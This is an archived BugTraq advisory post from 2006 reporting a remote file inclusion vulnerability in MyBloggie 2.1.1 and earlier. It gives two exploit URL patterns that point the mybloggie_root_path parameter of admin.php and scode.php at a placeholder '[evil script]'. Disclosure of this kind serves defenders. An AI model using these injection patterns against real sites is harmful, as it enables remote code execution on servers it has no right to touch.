BugTraq
# MHG Security Team --- MyBloggie 2.1.1 version Remote File Include Vulnerabilit Jun 02 2006 05:57PM
erne ayaz (beceriksiz1986 hotmail com)
# Milli-Harekat Advisory ( www.milli-harekat.org )

# MyBloggie <= 2.1.1 version - Remote File Include Vulnerabilities

# Risk : meduim

# Class: Remote

# Script : MyBloggie 2.1.1 version

# Msn : erne [at] ernealizm.com

# Credits : ERNE

# Thanks : Dj_ReMix,Eskobar,Blackened,TR_IP,ßy
KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS

# Vulnerable :

http://www.site.com/blog/admin.php?mybloggie_root_path=[evil script]

http://www.site.com/blog/scode.php?mybloggie_root_path=[evil script]

_________________________________________________________________
Don?t just search. Find. Check out the new MSN Search!
http://search.msn.click-url.com/go/onm00200636ave/direct/01/

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus